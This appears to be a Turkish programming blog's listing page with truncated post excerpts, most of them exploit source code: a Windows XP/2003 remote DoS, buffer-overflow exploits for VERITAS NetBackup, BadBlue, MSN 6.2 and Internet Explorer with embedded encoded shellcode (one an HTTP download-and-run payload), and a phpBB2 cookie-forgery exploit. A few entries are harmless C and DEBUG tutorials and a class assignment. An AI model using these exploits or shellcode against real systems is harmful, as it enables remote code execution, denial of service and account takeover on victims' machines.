163 Belge Programlama

Microsoft Windows XP/2003 Remote DoS

 #define _BSD_SOURCE#include <stdio.h>#include <ctype.h>#include <sys/socket.h>#include <netinet/in.h>#include <netinet/in_systm.h>#include <netinet/ip.h>#include <netinet/tcp.h>#include <sysexits.h>#include <stdlib.h>#include <unistd.h>#include <sys/types.h>/*Windows Server 2003 and XP SP2 remote DoS exploitTested under OpenBSD 3.6 at WinXP SP 2Vuln by Dejan Levaja <dejan_@_levaja.com>(c)oded by __blf 2005 RusH Security Team , http://rst.void.ruGr33tz: zZz, Phoenix, MishaSt, Inck-vizitorFuck lamerz: Saint_I, nmalykh, Mr. ClumsyAll rights reserved.*///checksum function by r0achu_short checksum…

Structer’dan FILE’a veri yazdirma

Bu yazmış oldugum program normal array olmayan pointer kullanmayan hatta malloc bile kullanmayan bir sturucter a kullanıcıdan veri yazip daha sonra structerdaki veriyi aynen binary modda açılmış bir dosyaya aktaran bir programcik. #include struct data { int id; char name[20]; double price; int quantity; }product; void main() { FILE *ptr; ptr=fopen(“data.txt”,”wb+”); product.id=1; char blank[2]; while(product.id!=0)…

DEBUG ile Programlama

Debug programı, uzantısı COM ve EXE olan doğrudan çalıştırılabilir dosyaları oluşturmanızı ve bu uzantılara sahip programları inceleyip değiştirebilmenizi sağlar.   DEBUG komutunu verdiğinizde karşınıza bir tire çıkar. Bu tire, debug programının, vereceğiniz komutları beklediğini gösterir. Vereceğiniz komutlar yardımı ile mikroişlemcinin yazmaçlarını (register) ve belleği inceleyebilir, basit programlar yapabilirsiniz.  8088 Ve 8086 mikroişlemcilerinde 14 adet yazmaç…

Csit114 Term Project

Project (CSIT114) Assignment Date: 06.01.2006 Submit Date : 23.01.2006 THE PROJECT SHOULD BE SUBMITTED DURING THE FINAL WEEK BOTH ON FLOPPY AND PAPER. Write a C program for a Company called stock.cpp that uses 5 functions, creat_file(), (first create the file that the user will insert information about stock) insert_info(), (the user will input stock…

VERITAS NetBackup Remote Buffer Overflow

Targeted port : 13701/*DESCRIPTIONVeritas NetBackup Stack Overflow (tcp/13701)“Volume Manager Daemon” ModuleUSAGEC:NetBackup>nb 192.168.0.2 4444 192.168.0.200 0Veritas NetBackup v4/v5 “Volume Manager Daemon” Stack Overflow.C:NetBackup>nc 192.168.0.200 4444Microsoft Windows 2000 [versie 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.C:WINNTsystem32>INFORMATIONI wrote this just for educational purposes :).Because the buffer is only very small, I had to write small shellcode.The code is less than…

BadBlue – Remote buffer overflow

 #include <winsock2.h>#include <windows.h>#include <stdio.h>#pragma comment (lib,”ws2_32″)#define TIMEOUT 1#define VALIDSERVER “BadBlue/2.5”#define GETHEADER “HEAD HTTP/1.1 “#define HTTPSEND1 “GET /ext.dll?mfcisapicommand=”#define HTTPSEND2 “&page=index.htx HTTP/1.1 Accept: */* Accept-Language: es Accept-Encodin: gzip, deflate User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: “#define HTTPSEND3 ” Connection: Keep-Alive “#define LEN 500char shellcode[]=“xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33″“xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C”“x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE”“x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB”“xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77″“xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77″“xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77″“xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77″“xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77″“xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77″“xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77″“xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77″“xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77″“xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB” “x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C”“xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0″“x8Ax88xAFx87x03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77″“xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0″“xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB”“x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5″“x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98″“xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE”“x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77″“xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8″“x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF”“x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90″“x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74″“xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4″“xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94″“x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5″“xD3x4Ax8Cx88”;struct TARGETS {int num;char name[58];char offset[5];} targets[]= {// char offset[]=”x56x66x46x78″;…

phpBB2.0 Session Handler

  #include <stdio.h>#include <stdlib.h>#include <string.h>int main(int argc, char** argv[]) {FILE *pointer;char contenido[10000],cookie[91]=”a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22″,cookief[9]=”%22%3B%7D”, cookiec[106],cookie_false[92]=”a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D”,*pos;int p=0, i=0;if (argc!=2) {printf(“Usage: phpbb_exploit.exe user_id “);exit(0);}pointer=fopen(“cookies.txt”, “r”);if (pointer) {fread(contenido, 300, 10, pointer);fclose(pointer);} else {printf(“The file can’t be open “);exit(0);}strcpy(cookiec, cookie);strncat(cookiec, argv[1], 6);strcat(cookiec, cookief);if (pos=strstr(contenido, cookiec)) {p=pos – contenido;while (i<92) {if (cookie_false[i]!=NULL)contenido[p]=cookie_false[i];p++;i++;}}else {printf(“The file cookies.txt isn’t valid for execute theexploit or the…

MSN 6.2 OverFlow

  #include <stdio.h>#include <stdlib.h>#include <conio.h>#include <string.h>#ifdef __BORLANDC__#include <mem.h>#endif#define NOP 0x90char png_header[] =“x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52″“x00x00x00x40x00x00x00x40x08x03x00x00x00x9DxB7x81″“xECx00x00x01xB9x74x52x4Ex53″;char pngeof[] = “x90x90x90x59xE8x47xFExFFxFF”;/* Generic win32 http download shellcodexored with 0x1d by delikon (http://delikon.de/) */char shellcode[] = “xEB” “x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF”“xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13″“xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2″“xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90″“x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2″“xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48″“x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43″“x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96″“x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD”“xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47″“x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D”“x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33″“x78x65x78x1D”;FILE *di;int i = 0;short int weblength;char *web;char *pointer = NULL;char *newshellcode;/*xor cryptor*/char *Sifrele(char *Name1){char *Name=Name1;char xor=0x1d;int Size=strlen(Name);for(i=0;i<Size;i++)Name[i]=Name[i]^xor;return Name;}void main(int argc, char *argv[]){if (argc < 3){printf(“MSN…

Internet Explorer CSS Remote Buffer overflow

 #include <stdio.h>#include <string.h>#include <tchar.h>char bug[]=“x40x63x73x73x20x6Dx6Dx7Bx49x7Bx63x6Fx6Ex74x65x6Ex74x3Ax20x22x22x3Bx2F”“x2Ax22x20x22x2Ax2Fx7Dx7Dx40x6Dx3Bx40x65x6Ex64x3Bx20x2Fx2Ax22x7Dx7Dx20x20x20″;///////////////////////////////////////////////////////*shellcode :MessageBox (0,”hack ie6″,0,MB_OK);–XOR EBX,EBXPUSH EBX ; 0PUSH EBX ; 0ADD AL,0FPUSH EAX ; Msg ” Hack ie6 “PUSH EBX ;0JMP 746D8E72 ;USER32.MessageBoxA*/char shellcode[]= “x33xDBx53x53x04x0Fx50x53xE9xCBx8Dx6Dx74″“x90x90x48x61x63x6Bx20x69x65x36x20x63x73x73″;////////////////////////////////////////////////////////// return address :: esp+1AC :: start shellcode//MOV EAX,ESP//ADD AX,1AC//CALL EAXchar ret[]= “x8BxC4x66x05xACx01xFFxD0″;int main(int argc, char* argv[]){char buf[8192];FILE *cssfile;int i;printf(” Internet Explorer(mshtml.dll) , Cascading Style SheetsExploit “);printf(”…